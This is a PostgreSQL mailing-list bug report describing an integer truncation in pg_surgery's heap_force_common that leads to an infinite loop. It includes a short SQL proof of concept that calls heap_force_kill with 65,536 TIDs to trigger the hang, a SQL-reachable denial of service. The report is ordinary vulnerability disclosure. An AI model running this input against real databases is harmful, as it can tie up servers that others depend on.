agora inbox for pgsql-bugs@postgresql.org  
help / color / mirror / Atom feed
From: PG Bug reporting form <noreply@postgresql.org>
To: pgsql-bugs@lists.postgresql.org
Cc: 1217816127@qq.com
Subject: BUG #19607: Bug 18: `pg_surgery` infinite loop in `heap_force_common`
Date: Mon, 03 Aug 2026 08:40:59 +0000
Message-ID: <19607-2f256a66481c514b@postgresql.org> (raw)

The following bug has been logged on the website:

Bug reference:      19607
Logged by:          Yuelin Wang
Email address:      1217816127@qq.com
PostgreSQL version: 19beta2
Operating system:   Linux (Ubuntu 24.04, x86_64)
Description:        

### Summary

In `contrib/pg_surgery/heap_surgery.c`, a huge TID array can truncate an
index into `OffsetNumber`. The loop no longer reaches its end condition and
the statement keeps running until cancellation. This is a SQL reachable
denial of service when `pg_surgery` is installed.

### PoC

SQL script:

```sql
CREATE EXTENSION IF NOT EXISTS pg_surgery;

CREATE TABLE vuln_surgery_loop(a int);
INSERT INTO vuln_surgery_loop
SELECT g FROM generate_series(1, 300) AS g;

SET statement_timeout = '15s';

SELECT heap_force_kill(
    'vuln_surgery_loop'::regclass,
    ARRAY(
        SELECT '(0,1)'::tid
        FROM generate_series(1, 65536)
    )
);

RESET statement_timeout;
```

### Result

The call remains active until `statement_timeout`. A finite array pass of
this size should complete quickly, so the timeout confirms the integer
truncation induced infinite loop.








view thread (5+ messages)  latest in thread

Message-ID: <19607-2f256a66481c514b@postgresql.org>
Permalink:  ../19607-2f256a66481c514b@postgresql.org/
Also on:    postgresql.org/message-id/19607-2f256a66481c514b@postgresql.org

reply

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Reply to all the recipients using the --to and --cc options:
  reply via email

  To: pgsql-bugs@postgresql.org
  Cc: noreply@postgresql.org, pgsql-bugs@lists.postgresql.org, 1217816127@qq.com
  Subject: Re: BUG #19607: Bug 18: `pg_surgery` infinite loop in `heap_force_common`
  In-Reply-To: <19607-2f256a66481c514b@postgresql.org>

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

This inbox is served by agora; see mirroring instructions
for how to clone and mirror all data and code used for this inbox